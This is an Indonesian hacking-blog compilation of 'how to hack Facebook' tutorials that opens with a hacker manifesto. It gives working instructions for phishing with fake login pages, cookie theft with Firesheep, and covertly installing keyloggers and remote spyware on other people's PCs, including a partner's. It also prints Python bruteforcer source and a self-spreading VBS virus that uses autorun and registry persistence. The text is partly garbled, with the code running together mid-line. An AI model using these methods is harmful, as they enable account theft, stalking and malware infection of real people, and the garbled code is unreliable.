Hacker, Kami Suka Dengan Kata Ini. Sejak Kami Kenal Internet Kami Sudah Suka Dengan Kata Hacker. Terserah Anda Mau Bilang Kami Apa, Yang Jelas Kami Bangga Menjadi Hacker. Ya! Itulah Kami, Hacker Adalah Sebuah Impian Dan Imajinasi Tanpa Batas. Yang Setiap Orang Mungkin Tidak Bisa Memilikinya. Hacker, Ya Itu Kami, Karena Dengan Kata Itulah Kami Mau Belajar, Setidaknya Bisa Belajar Sendiri. Sebab Di Sekolah, Kampus, Dan Di Lembaga Ilmu Pendidikan Kami Hanya Sedikit Mendapatkan Ilmu. Apa Gunanya Kalau Bisanya Cuma: Tolong Itu Di Pelajari Sendiri Ya?. Lebih Baik Kami Terinspirasi Dengan Kata Hacker Yang Membuat Kami Maju Dan Semangat Untuk Belajar Dan Belajar Lagi. Orang Bodoh Sekalipun Pasti Mau Belajar Kalau Mendengar Kata Hacker. Sampai Kami Sendiri Sering Mendengar: Bagaimana Sih Caranya Jadi Hacker. Ya! Itulah Kami, Inspirasi Tanpa Batas Dengan Menjadi Hacker. Kami Hacker! Kami Tidak Peduli Apa Kata Orang, Yang Jelas Kami Tahu Sendiri Itu Ada Dalam Diri Kami. Inilah Perjuangan Kami, Inilah Takdir Kami, Inilah Jalan Kami, Inilah Darah Kami, Inilah Pikiran Kami Dan Inilah Kehidupan Kami. Dunia Maya Itu Luas Bung, Jangan Pernah Mengambil Sesuatu Dari Sebuah Persepsi Dan Menyalahkan Kami Sebagai Hacker! Sekali Lagi, Dunia Maya Itu Luas Dan Ini Dunia Global Bung! Bukan Hanya Dunia Milikmu! Kami Bebas Melakukan Apa Yang Kami Inginkan Di Internet. Karena Dunia Kami Adalah Dunia Maya Dan Dunia Open Source. Hidup Kami Antara 0 Dan 1, Dimana Dengan Dua Hal Tersebut Kami Menemukan Partikel Partikel Dunia Visual. Dengan 0 Dan 1 Kita Bisa Mengkonversi Pikiran Kita Menjadi Lebih Bervariasi Dan Inovasi Yang Tak Kenal Henti. Kami Adalah Genetica Yang Yang Tak Pernah Lelah Untuk Berusaha Mencari Apa Saja Yang Bisa Kami Angkat Untuk Dijadikan Bahan Uji Coba Demi Memaksimalkan Ide Yang Ada Di Pikiran Kami. Kami Adalah Sekelompok Orang Yang Tak Akan Pernah Melepas Suatu Kesempatan Untuk Dilewatkan Dan Kami Tak Akan Pernah Lelah Untuk Mencoba Serta Terus Mencoba. Kami Bisa Masuk Komputer Orang, Kami Bisa Akses Komputer Orang, Kami Bisa Oprek Komputer, Kami Bisa Bikin Program, Kami Bisa Melakukan Apa Yang Anda Tidak Bisa Lakukan. Terus Kenapa? Apa Salah Kami? Trus Anda Bilang Kami Kriminal? Anda Salah Besar Bung! Inilah Dunia Kami Yang Penuh Keingintahuan Tentang Ilmu Pengetahuan. Inilah Kriminal Yang Anda Salah Artikan, Kriminal Yang Sebenarnya Telah Terukir Di Kepala Anda Kalau Hacker Adalah Kejahatan! Karena Anda Tidak Tahu Dan Tidak Mengerti Sama Sekali Tentang Kami. Perhatikan Kami Bung, Inilah Kami Yang Anda Sebut Sebagai Para Kriminal. Yang Tidak Pernah Melakukan Kekerasan, Yang Haus Akan Pembelajaran, Yang Menginginkan Kemajuan, Yang Memiliki Motivasi Dan Persahabatan. Kami Ingin Bebas Dalam Berkomunikasi Dan Menggunakan Informasi, Bebas Menganalisa Code Dan Script. Bebas Bertukar, Belajar, Berbagi Dan Membagi Antara Satu Dengan Yang Lainnya. Inilah Kami, Yang Akan Menggunakan Otak Kami Untuk Menemukan Sesuatu Yang Belum Anda Temukan. Kami Ingin Bebas Dalam Berselancar Di Dunia Maya, Sehingga Tidak Ada Sesuatu Apapun Yang Bisa Menghalagi Keinginan Kami Untuk Mencari, Menemukan, Memberi, Dan Memanfaatkan Apa Yang Kami Yakini. Kami Juga Menginginkan Kebebasan Dalam Mengexplore Ide Ide Kami. Menjelajahi Bit Bit Dunia Maya Yang Tanpa Batas, Sehingga Membuka Lebar Cakrawala Ilmu Pengetahuan Bagi Kami, Anda Dan Semua Orang.

Inilah Definisi Tentang Hacker Yang Perlu Anda Pahami: Hacker adalah sebutan untuk mereka yang menggunakan keahliannya dalam hal komputer untuk melihat, menemukan dan memperbaiki kelemahan sistem keamanan dalam sebuah sistem komputer ataupun dalam sebuah software. Hasil pekerjaan mereka biasanya dipublikasikan secara luas dengan harapan sistem atau software yang didapati memiliki kelemahan dalam hal keamanan dapat disempurnakan di masa yang akan datang. Dan Dengar Sahabat, We Are Hacker! Ini Adalah Manifesto Kami. Kebesaran Seseorang Tidak Terlihat Ketika Dia Berdiri Dan Memberi Perintah, Tetapi Ketika Dia Berdiri Sama Tinggi Dengan Orang Lain Dan Membantu Orang Lain Tersebut Untuk Mengeluarkan Yang Terbaik Dari Diri Mereka Untuk Mencapai Kesuksesan Bersama. Dan Ingat Sahabat! Jika Anda Bertemu Dengan Hacker, Cracker, Coder, Blogger, Defacer, Virus Creator Dan Cyber Lainnya Yang Katanya Kriminal Cyber! Percayalah, Bahwa Sesungguhnya Anda Telah Bertemu Dengan KAUM INTELEKTUAL Yang Belum Anda Ketahui.

Download Tanpa LoadingMau sedikit share tentang cara mendownload file tanpa perlu lama menunggu. Biasa banyak banget nih yang download dari MEDIAFIRE, RAPIDSHARE, HOTFILE, MEGAUPLOAD. Tapi masing menunggu 30-60 detik untuk click, bahkan bisa jauh lebih lama Padahal sebenernya juga cukup mudah sih, tinggal memakai plugin berikut di Mozilla Firefox anda. Hanya beberapa 1-5 detik saja, anda sudah bisa download sepuas-puasnya. Download File Untuk Mozilla Firefox Disini: http://dl.skipscreen.com/files/SkipScreen-Setup.exe

Setiap kali anda berkunjung ke website untuk download, maka screen ini pasti akan muncul (Kekurangannya sih cuman ini doank). Berikut adalah support tools yang include didalam nya:

Rapidshare (dont click! its automatic!) Megaupload (captcha action coming soon!) Mediafire Uploaded.to zShare (now with a listen-first option!) Sharebee DepositFiles Sendspace Divshare Linkbucks Link-protector

Oke, selamat menikmati download & tanpa perlu lagi menunggu.

Berikut adalah kumpulan lengkap berbagai cara hack facebook, berbagai cara hack fb, berbagai cara hack account facebook hack facebook teman hack facebook pacar, hack facebook musuh cara hack facebook cara hack facebook orang lain cara hack facebook cara hack fb cara hack password facebook cara hack fb 2011 cara hack facebook orang. Cara hack facebook 2011 cara hack fb orang lain cara hack fb terbaru cara hack fb 2011 cara hack fb orang cara hack akun fb cara hack akun fb orang lain cara hack akun facebook terbaru cara hack akun facebook 2011 cara hack password fb cara hack account fb cara hack account facebook. Cara hack account facebook 2011 cara hack account facebook terbaru cara hack facebook teman cara hack facebook pacar cara hack fb teman cara hack fb pacar crack facebook cara crack fb. Cara menjebol fb cara menjebol akun fb cara membobol password facebook cara menjebol password facebook cara membobol facebook cara mengetahui account facebook cara mengetahui password facebook cara menghack facebook tutorial hack facebook tutorial hacking facebook. Tutorial hack fb, tutorial hacking fb tutorial hacking account fb tutorial hacking account facebook, tutorial hack account facebook, tutorial hacking password facebook tutorial hack password facebook tutorial crack facebook.

Cara Hack Facebook Dengan Metode Fake Login / Phising / ScamPERTAMA: Cara ini paling banyak digunakan dan terbukti efektif untuk meng-hack facebook, sebenarnya metodenya simple saja, kita tinggal membuat halaman login palsu yang kemudian kita upload ke sebuah website bahkan website gratisan pun bisa, kemudian kita pancing pengguna facebook agar menuju halaman login facebook palsu tersebut, cara memancing pengguna facebook pun ber macam macam bisa lewat email palsu yang mengatasnamakan facebook, link login palsu dan metode social engineering lainnya. Cara mencegah hack facebook dengan metode ini : sebelum anda login atau memasukkan username dan password anda pastikan bahwa alamat url tersebut benar, jika anda tidak yakin buka saja sebuah jendela baru, masukan alamat facebook (http://www.facebook.com) dan login melalui jendela tersebut. pastikan keaslian email yang mengatasnamakan facebook yang memancing anda agar login facebook yang masuk ke inbox anda, atau abaikan saja email tersebut. KEDUA:Facebook banyak sekali orang yang menggunakannya di indonesia hingga ribuanpun. hampir-hampir saja facebook diharamkan. 1. Silahkan anda daftar di http://www.united.net.kg/ atau http://www.globalweb.com.ru/hosting.php atau http://biz.ht/ mengapa saya suruh anda daftar disana ? di web hosting sana sangat gratis dan support php juga dari pada di ripway.com 2. setelah anda berhasil mendaftar, masuk ke FILE MANAGERhapus file index.html. (akan ada di Cpanel masing2 nantinya) 3. oke, kita mulai praktek kita. yang dibutuhkan adalah file index.php dan write.php sebagai inti fakelogin silahkan download scriptnya dahulu disini atau di http://www.ziddu.com/download/5023245/scriptFakeloginFacebook.rar.html ukuran cuma 9kb. 4. setelah anda download. Disana ada dua file sebut saja index dan write kedua-duanya silahkan anda upload di web hosting yang tadi anda sudah daftar. 5. lalu tes terlebih dahulu index.php yg telah kalian upload dan login dari situ, klo berhasil.. akan ada file baru ;Password.txt [bertujuan sebagai tempat dimana userID dan password yang akan tertampung di facebook fakelogin kamu] 6, alright! selesai sampai di sini. . .

untuk penyebarannya silahkan dengan cara masing2 disini saya cm kasih contoh satu untuk pengambilan secara paksa account2 facebook mania.. buka file index di domain webhosting kalian..ambil URL nya.. [penting] terus untuk pengguna firefox: buka tools>option>main preview:

disni fungsinya kita mengarahkan agar browser waktu pertama kali dibuka langsung mengarah ke file kita tadi. memungkinkan hasil buruan kalian lebih banyak nantinya. boleh di sebar ke komputer temen/di warnet2 kesayangan. atau.. bisa juga menyebarkan dengan cara seperti ini

kamu buat account baru,di yahoo,gmail,atau sejenisnya dengan nick Facebook@ or something like that. diatas cm contohsilahkan kamu buat seni sendiri enjoy.. mudahkan ?? semoga berhasil . . .. KETIGA:Yang paling penting siapin dulu web hosting buat naruh file fake login bisa yang gratis atau bayar terserah kalian pilih yg mana.,.,.,.,.,., 1. download dan extract file index.html download dulu disini 2. download dan extract file logs.php download dulu disini 3. download dan extract file log.txt download dulu disini Password : Flow dah disiapin belum web hostingnya? ql belum aku saran mending pakek ripway. nah kalau sudah registrasi, kalian upload dech file file yang kalian extract tadi.,.,.,.,. pengertian: - index.html : Halaman utama login palsu, alamat ini yang kalian sebar ke target. Ex: http://h1.ripway.com/nama_kalian/index.html - logs.php : Berfungsi untuk mengirimkam hasil hack dari index.html ke logs.txt - logs.txt : Berfungsi untuk menampung hasil jerih payah kita Ex: Email + Password Facebook. sebarin dech alamat Fake Login kita tadi (index.html),.,.,., tinggal tunggu orang yang terlalu ceroboh login pakek Fake login kita. saran bagi facebooker : 1) Perhatikan dengan benar link address websitenya. Contoh klo FB linknya: http://www.facebook.com 2) Jangan pernah membuka link atau bahasa pemograman (CSS, XTML, XML, atau HTML) yang aneh. Jika di klik, kemungkinan account kita akan memberikan username dan password kita. 3) Pakailah virtual keyboard yang bisa diperoleh dengan mudah. Untuk Windows tampilan XP, hanya cukup klik start -> All Programs -> Accessories -> Accessibility -> On-Screen Keyboard Untuk Windows tampilan bukan XP, hanya cukup klik start -> Program Files -> Accessories -> Accessibility -> On-Screen Keyboard 4) Bila bermain di Warung Internet (Warnet), hindari check-list kotak Remember me pada saat login, karena hal itu dapat menyimpan username dan password di komputer tersebut. Kecuali memakai komputer pribadi. 5) Jika anda tiba-tiba diminta login ulang, sebaiknya hati hati, karena kemungkinan halaman pe-login ulang tersebut adalah halaman palsu yang sengaja dirancang. bila terlanjur cepat ganti password kalian,.,.,.,.

Cara Hack Facebook Dengan Network SniffingPERTAMA:Bagi anda pengguna facebook yang menggunakan koneksi internet yang juga digunakan banyak orang seperti warnet atau koneksi internet di kampus atau tempat umum atau hotspot, apalagi yang gratisan harap berhati-hati. cara hack facebook dengan metode ini cukup mudah, berbekal software packet sniffer yang sangat mudah di download dan digunakan untuk memantau dan menyimpan paket lalu lintas jaringan, seseorang bisa dengan mudah membobol akun facebook dengan memanfaatkan paket data yang tersimpan tadi. cara menghindari agar akun facebook anda tidak kena hack dengan cara ini adalah dengan berhati-hati saat mengakses facebook, pastikan warnet atau hotspot area yang anda gunakan benar-benar aman. KEDUA:Cukup mudah untuk hacking facebook account saat ini, kmu dapat menggunakan firefox addon freesheep, yaitu sebuah addon Firefox yang mampu mencuri sesi cookie dari Facebook, Twitter dan account lainnya pada Web 2.0 yang tidak terenkripsi jaringan nirkabel terbuka. cara menggunakanya sebagai berikut: 1. Download .xpi file di http://codebutler.github.com/firesheep/ 2. install file .xpi tersebut 3. Install WinPcap, download di www.winpcap.org 4. jika instlasi firesheep dan wincap sudah selesai, buka firefox, klik menu tools > addons >Firesheep 5. klik preferences icon dan pilihi kartu interface jaringan pc / wireless card 6. klik Start Capturing 7. tunggu beberapa saat, jika ada pengguna wireless yang mengakses website facebook maka firesheep akan siap menghack cookies nya. nah gimana cara mencegah pencurian password dengan firesheep ini? kamu dapat menggunakan software ForceTLS, download di https://addons.mozilla.org/en-US/firefox/addon/force-tls/ KETIGA:Bismillah, pada postingan kali ini akan membahas tentang bagaimana cara melakukan sniffing paket data situs jejaring facebook yang keluar masuk dari perangkat komputer yang digunakan untuk mengakses situs jejaring sosial tersebut. postingan ini berisi jawaban dari tugas yang diberikan pada mata kuliah Keamanan Informasi dengan soal sebagai berikut: Anda diminta untuk menggunakan program sniffer (penyadap) seperti wireshark, tcpdump, atau sejenisnya untuk melakukan salah satu dari hal di bawah ini: 1. mengukur jumlah data yang digunakan untuk membuka satu sesi gmail atau facebook; 2. memantau serangan dari port scanning yang dilakukan dengan menggunakan program nmap. Untuk yang (1) yang disebut satu sesi adalah login, membaca sebuah email (atau menulis sebuah email), kemudian logout. Jangan lupa program sniffer diset agar *semua* data ditangkap. Biasanya default dari program sniffer hanya menangkap header saja. Tujuan utamanya adalah untuk menghitung jumlah data yang ditangkap. Untuk (2) tujuannya adalah untuk melihat pola serangan port scanning yang dilakukan oleh nmap. Apakah dia melakukan scanning dengan menguji port secara berurutan?

langsung saja menuju langkah-langkah yang dilakukan untuk melakukan sniffing paket data ini: 1. pertama-tama buka aplikasi wireshark 2. kedua, pilih menu Capture kemudian submenu Interfaces, atau bisa juga dengan jalan pintas menekan tombol Ctrl+I 3. pilih interface yang ingin anda sadap paket datanya, disarankan koneksi yang dipilih adalah koneksi yang menggunakan kabel bukan koneksi yang nirkabel maupun koneksi dengan modem USB atau sejenisnya. Pilih menu Option pada interface yang ingin Anda sadap paket datanya. 4. pada bagian Capture filter masukkan sebagai berikut(ganti alamat.ip.komputer.anda dengan alamat IP komputer yang digunakan untuk melakukan penyadapan paket data) host www.facebook.com and host alamat.ip.komputer.anda 5. Klik start, maka proses penyadapan akan segera dimulai 6. Jika ingin menyudahi proses penyadapan, klik tombol stop atau dengan menekan jalan pintas Ctrl+e 7. Untuk mengetahui statistik paket yang berhasil disadap, cukup dengan memilih menu Statistic kemudian submenu Summary, maka akan tampil hasil seperti contoh berikut:

hasil statistik sniffing paket data facebook Pada data yang saya sadap dengan menggunakan wireshark ini paket data dari facebook cukup kecil (56948 bytes) hal ini mungkin dikarenakan metoda caching yang ada pada browser yang saya gunakan untuk membuka facebook masih menyimpan data-data yang diperlukan sehingga data cukup kecil. sekian postingan kali ini.

Cara Hack Facebook Dengan KeyloggerPERTAMA:Kembali lagi bagi anda yang menggunakan akses internet dari warnet atau hotspot dan mungkin juga di kampus atau di kantor harap berhati-hati. cara hack facebook dengan metode ini juga cukup mudah, tinggal pasang software keylogger yang berfungsi untuk merekam aktifitas penggunaan keyboard dan kemudian menggunakan data tersebut untuk mendapatkan username dan password facebook. seseorang bisa saja memasang software keylogger ke laptop atau pc anda atau menyebar trojan kedalam komputer di dalam sebuah jaringan komputer yang tidak aman. cara mencegahnya : pastikan antivirus pada komputer anda selalu up to date.

KEDUA:Hai facebooker! Tutorial facebook kali ini akan menjelaskan cara hack facebook dengan keylogger. Caranya gimana? Keylogger itu apa? Keylogger merupakan software yang berfungsi untuk memonitoring kegiatan PC dengan merecord / merekam kegiatan keyboard. Berikut akan dijelasin cara penggunaannya. AMPUH! Mau ? Bagi facebooker yang belum mempunyai keylogger, bisa download secara gratis disini. Sebenarnya software keylogger itu macam-macam namanya. Yang krisna gunakan yaitu keylogger yang bernama DOUGLAS 1.1. Sebelum beraksi, pastikan dulu korbannya siapa. apakah PC rumah, PC Temen, PC warnet, PC kantor, atau mungkin PC Pacar/Istri hahahaha. Kalau sudah pasti, sekarang krisna jelasin dah cara penggunaannya. 1. Setelah di download, jangan lupa extract file tersebut. OK ! Setelah file download tersebut di extract, akan ada 2 folder : Folder DOUGLAS_EN dan Folder DOUGLAS_ES . 2. Hapus aja Folder DOUGLAS_ES, gag penting !!! tanya kenapa ? karena pake bahasa spanyol hehehe, yang kita gunakan yaitu Folder DOUGLAS_EN, karena menggunakan bahasa Inggris. hihihi 3. Langkah selanjutnya yaitu buka folder DOUGLAS_EN. Di dalam pasti ada 6 File dan 1 Folder DATA. iya to ?? hohoho 4. Double klik pada file install.exe . Nanti pada proses penginstalan, anda akan diminta memasukan password. Isilah password tersebut, terserah tapi yang mudah di ingat !! 5. Kalau proses penginstalan sudah selesai, terus ??? Nah, santai !!! mendingan sekarang anda bikin kopi + beli mendoan terlebih dahulu. Untuk selanjutnya mudah kok ! hahahaha. Habiz buat kopi + beli mendoan, kita ngapain ??? tidur aja hahaha Pastikan keylogger sudah terinstal, untuk menggunakan keylogger tinggal tekan tombol CTRL+ALT+SHIFT+F9 pada keyboard anda

Untuk melihat informasi yang sudah di rekam oleh keylogger, anda pilih READ INFORMATION. Terus masukkan password yang sama dengan password yang anda masukkan waktu proses penginstalan. Nah, Selese dah !!! Mudah to ??? Terus kalau di dalamnya kosong / tidak ada informasi apa-apa, itu kenapa ?? Itu

disebabkan karena tidak adanya aktifitas. Maksud aktifitas disini yaitu Penggunan PC tersebut. Contoh : Misal anda sedang facebookan, coba anda logout dari Facebook anda. Pastikan keylogger telah terinstal Di PC tersebut, terus coba anda login kembali dengan memasukkan alamat email dan password facebook anda. Lalu buka keylogger anda dengan menekan tombol CTRL+ALT+SHIFT+F9 Kemudian pilih READ INFORMATION, lalu masukkan password keylogger anda. Hasilnya apa ??? anda sendiri yang tahu.. Selamat mencoba KETIGA:

SniperSpy adalah Password Hacking software Remote yang dikombinasikan dengan Remote Install dan Remote Viewing feature. Setelah diinstal pada PC remote, Anda hanya perlu login ke account SniperSpy. Anda secara pribadi dapat melihat aktivitas log dari PC remote! Ini berarti bahwa Anda dapat melihat log dari PC remote dari mana saja di dunia selama Anda memiliki akses internet. Apakah Anda ingin Spy pada PC Remote? SniperSpy memungkinkan Anda untuk jarak jauh mata-mata setiap PC. Ini adalah satu-satunya perangkat lunak mata-mata remote PC dengan panel kontrol yang AMAN. Remote PC software Spy juga menyimpan screenshot bersama dengan teks log chatting, website, penekanan tombol dalam bahasa dan banyak lagi. Remotely, melihat aktivitas anak Anda, karyawan atau siapapun menggunakan PC jauh dari Anda. Termasuk LIVE admin perintah dan kontrol. Fitur SniperSpy : 1. Adalah perangkat lunak mata-mata SniperSpy deployable 2. Gaib Stealth Mode Option. Bekerja dalam mode siluman lengkap. Tidak terdeteksi 3. Log Semua keystrokes 4. Records setiap Password (Email, Login, Instant Messenger dll) 5. Remote Monitor Seluruh Percakapan IM sehingga Anda bisa memata-matai kegiatan IM 6. Menangkap format .jpg ukuran penuh gambar dari jendela aktif 7. Real Time Screen Viewer 8. Remote reboot atau shutdown PC atau memilih untuk logoff pengguna Windows saat ini 9. Lengkap, bypass Firewall apapun

www.binushacker.net

Cara Hack Facebook Dengan Metode BruteforcePERTAMA:Cara hack facebook dengan metode ini adalah cara paling bodoh untuk membobol facebook dan biasanya paling terakhir digunakan, karena membutuhkan waktu yang tidak singkat. metode hacking facebook dengan cara ini adalah dengan menggunakan software bruteforce untuk menebak-nebak password facebook sebuah akun dari sebuah file dictionary / kamus atau juga character generator. cara mencegah hack facebook dengan metode ini adalah dengan melindungi alamat email yang anda gunakan untuk login facebook, caranya bisa bermacam-macam, anda bisa memisah antara email untuk umum dan email untuk login facebook dan tidak menampilkannya di halam profil facebook anda. KEDUA:Postingan tentang hacking facebook ini gue copas aja dari situs jasakom.com : Facebook, ? iya sapa yg tidak kenal dengan situs jejaring sosial ini. Ga punya account tetapi setidaknya pernah dengar nama ini bukan ). Jejaring Sosial ini mungkin salah satu fenomena di beberapa tahun belakangan ini setelah pendahulunya friendster. Nah sebagai situs pertemanan, situs jejaring sosial ini tidak luput dari ke isengan tangan2 jahil, motifnya pun beragam, mulai dari isengin pemiliknya, revenge, sakit hati, dan yg paling parah adalah karena dengan motif buat nyari CHIPS POKER (nah lo, ngaku aja lo pada ) Implementasi Facebook Hacking Dengan Brute Force Berbagai teknik telah banyak beredar di kalangan underground, teknik nya pun beragam, mulai dari teknik phising (fake login ), maupun keylogger hanya dengan tujuan untuk mendapatkan account pribadi targetnya. ok, cukup basa basinya rel..to the point aja deh sebelumnya kita musti bikin persiapan dolo, ibarat mo perang senjata harus lengkap . yg musti disiapin sebagai berikut 1. Musti punya server atau hosting (gratis/ bayar) buat upload and nyimpen script 2 berikut.

Facebook BruteForce Script Simple Dictionary Attack

Nah, file itu adalah file utama yg harus disimpan ke dalam hostingan 2. Buat Dictionary Attack bisa qmu bikin tambah dan edit sendiri dari wordlist Dictionary ataw mungkin bisa cari yg lebih lengkap. OK, persiapan telah selesai.saatnya ke medan perangga deng, maksudnya kita akan melakukan testing. disini saya asumsikan lo pada udah punya hosting buat tempat naroh file-file tadi. klo ga tau cara bikin hosting silahkan tanya ke google yah ) 1.pada source code Facebook Dictionary attacknya kita edit dolo sebelom di upload set_time_limit(0); kita ubah time limitnya menjadi gede misalnya 500 dan ini dalam hitungan detik hingga code itu menjadi set_time_limit(500); 2. $username =brute@force.org; // username korban misalnya target@bego.com hingga pada code menjadi $username =target@bego.com; 3. $dictionary =dictionary.txt; adalah tempat dictionary attack kita. biasanya diletakkan dalam satu directory

Setelah Semuanya di Edit, upload ke Hostingan yg kamu punya, misalkan saya punya Hosting (orang) yg saya pakai untuk contoh ini saya upload ke dalam satu directory bernama fb. Nah setelah kedua file tersebut sukses di upload dalam 1 direktory

setelah sukses, skr tinggal eksekusi tuh via eb address. misalkan lo nyimpen di direktory /home/xxx.com/images/ maka eksekusi aja di http://xxx.com/images/ jika di eksekusi maka script akan mencoba membruteforce account milik target lo.

Jika dah selesai , maka log hasil bruteforce tadi akan tersimpan dengan nama cookie.txt. pada direktory yg sama . silahkan di analisa hasilnya. And last word, thanks for you attention if u read a simple tutorial. KETIGA:

Silakan download FbBruteforce:

Berikut Codenya:#!/usr/bin/python # This is facebook bruteforcer tools # This was written for educational purpose and pentest only. Use it at your own risk. # Author will not be responsible for any damage !! # Toolname : facebookbruteforcer.py # Programmer : Gunslinger_ # Version : 1.0 # Date : Tue Jul 27 13:24:44 WIT 2010 # Special thanks to mywisdom to inspire me import re import os import sys import random import warnings import time try: import mechanize except ImportError: print "[*] Please install mechanize python module first" sys.exit(1) except KeyboardInterrupt: print "\n[*] Exiting program...\n" sys.exit(1) try: import cookielib except ImportError: print "[*] Please install cookielib python module first" sys.exit(1) except KeyboardInterrupt: print "\n[*] Exiting program...\n" sys.exit(1) warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning) # define variable __programmer__ = "gunslinger_ " __version__ = "1.0" verbose = False useproxy = False usepassproxy = False log = 'fbbruteforcer.log' file = open(log, "a") success = 'http://www.facebook.com/?sk=messages&ref=mb' fblogin = 'https://login.facebook.com/login.php?login_attempt=1' # some cheating .. ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)', 'Microsoft Internet Explorer/4.0b1 (Windows 95)', 'Opera/8.00 (Windows NT 5.1; U; en)', 'amaya/9.51 libwww/5.4.0', 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)', 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)', 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]' ] facebook = '''

__ _ _ / _| | | | | | |_ __ _ ___ ___| |__ ___ ___ | | __ | _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ / | || (_| | (_| __/ |_) | (_) | (_) | < |_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\ bruteforcer... Programmer : %s Version : %s''' % (__programmer__, __version__) option = ''' Usage : %s [options] Option : -u, --username | User for bruteforcing -w, --wordlist | Wordlist used for bruteforcing -v, --verbose | Set %s will be verbose -p, --proxy | Set http proxy will be use -k, --usernameproxy | Set username at proxy will be use -i, --passproxy | Set password at proxy will be use -l, --log | Specify output filename (default : fbbruteforcer.log) -h, --help | Print this help Example : %s -u brad@hackme.com -w wordlist.txt" P.S : add "&" to run in the background ''' % (sys.argv[0], sys.argv[0], sys.argv[0]) hme = ''' Usage : %s [option] -h or --help for get help ''' % sys.argv[0] def helpme(): print facebook print option file.write(facebook) file.write(option) sys.exit(1) def helpmee(): print facebook print hme file.write(facebook) file.write(hme) sys.exit(1) for arg in sys.argv: try: if arg.lower() == '-u' or arg.lower() == '--user': username = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-w' or arg.lower() == '--wordlist': wordlist = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-l' or arg.lower() == '--log': log = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-p' or arg.lower() == '--proxy': useproxy = True proxy = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-k' or arg.lower() == '--userproxy': usepassproxy = True usw = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-i' or arg.lower() == '--passproxy': usepassproxy = True usp = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-v' or arg.lower() == '--verbose': verbose = True elif arg.lower() == '-h' or arg.lower() == '--help': helpme() elif len(sys.argv) C: Then adaflashdisk = True End If Next If adaflashdisk = True Then set fileautorun = fso.CreateTextFile(drive.DriveLetter & & autorun.inf,False) fileautorun.WriteLine([AUTORUN]) fileautorun.WriteLine(RUN=wolio.vbs) End If End Sub

3. Merubah Registry agar Start Page pada Internet Explorer menjalankan file HTML yang diinginkanSub serangan_ie() If (regedit.RegRead(HKEY_CURRENT_USER\SOFTWARE\MicrosoftInternet Explorer\Main\Start Page)c:\windows\system32\wolio.html) Then regedit.RegWrite HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page,c:\windows\system32\wolio.html End If End SuB

4. Bagian ini digunakan untuk membuat sebuah file HTML yang akan menjalankan script virusSub buat_html() set filehtml = fso.CreateTextFile(c:windowssystem32wolio.html,True) filehtml.WriteLine() filehtml.WriteLine() ) filehtml.WriteLine(Welcome to Wolio)

filehtml.WriteLine(filehtml.WriteLine() filehtml.WriteLine() filehtml.WriteLine() filehtml.WriteLine() filehtml.WriteLine() filehtml.WriteLine(Selamat Datang di Wolio VBS ) filehtml.WriteLine() filehtml.WriteLine() End Sub

5. Pada bagian ini akan mencari folder yang ada dan menularinya dengan script virusSub serangan_folder(foldername) on error resume next For Each subfolder in fso.GetFolder(foldername).SubFolders fsource.Copy(subfolder & wolio.vbs) carifilejpg(subfolder) next End Sub

6. Bagian dibawah ini adalah bagian yang utama gunanya untuk mendeklarasikan variabel dan memangggil semua prosedurOn Error Resume Next dim fso, fsource, ftarget, fbackup, scriptname, myfolder, subfolder, preview, filetarget, sys, regedit, drive, filehtml, fileautorun dim adaflashdisk set fso = CreateObject(Scripting.FileSystemObject) set fsource = fso.GetFile(Wscript.ScriptFullName) set regedit=CreateObject(WScript.Shell) myfolder = Left(fsource,InStrRev(fsource,)) Copy-kan diri ke c:windowssystem32 fsource.Copy(c:windowssystem32wolio.vbs) Cari dan infeksi file JPG didalam folder carifilejpg(myfolder) Copy-kan diri di sub folder yang ada serangan_folder(myfolder) Regitry if (regedit.RegRead(HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\Version\Run\ Wolio)c:\windows\system32\wolio.vbs) Then regedit.RegWrite HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\VersionRun\Wolio,c:\windows\ system32\wolio.vbs End If Copy-kan diri ke semua drive aktif serangan_drive() Buat file wolio.html buat_html() Ubah Start Page di Internet Explorer serangan_ie()

Demikianlah artikel tentang cara pembuatan dan penuluran sebuah virus yang dibuat dengan VBS. Setelah mengetahui teknik penyebaran suatu virus yang dibuat dengan VBS, maka diharapkan kepada Anda agar dapat melakukan pencegahan. Virus yang kita pelajari kali ini sebenarnya hanya virus yang KONYOL, ini hanya membuka wacana Anda terhadap bahaya dari virus yang dibuat dengan VBS. Semoga artikel ini dapat bermanfaat. Source: c o k e l a t n e t[dot]b l o g s p o t[dot] c o m Silakan Ber Eksperimen Dengan Ide-Ide yang lain, Cheers.. Iseng-iseng mencolok Flash Disc saudara saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai

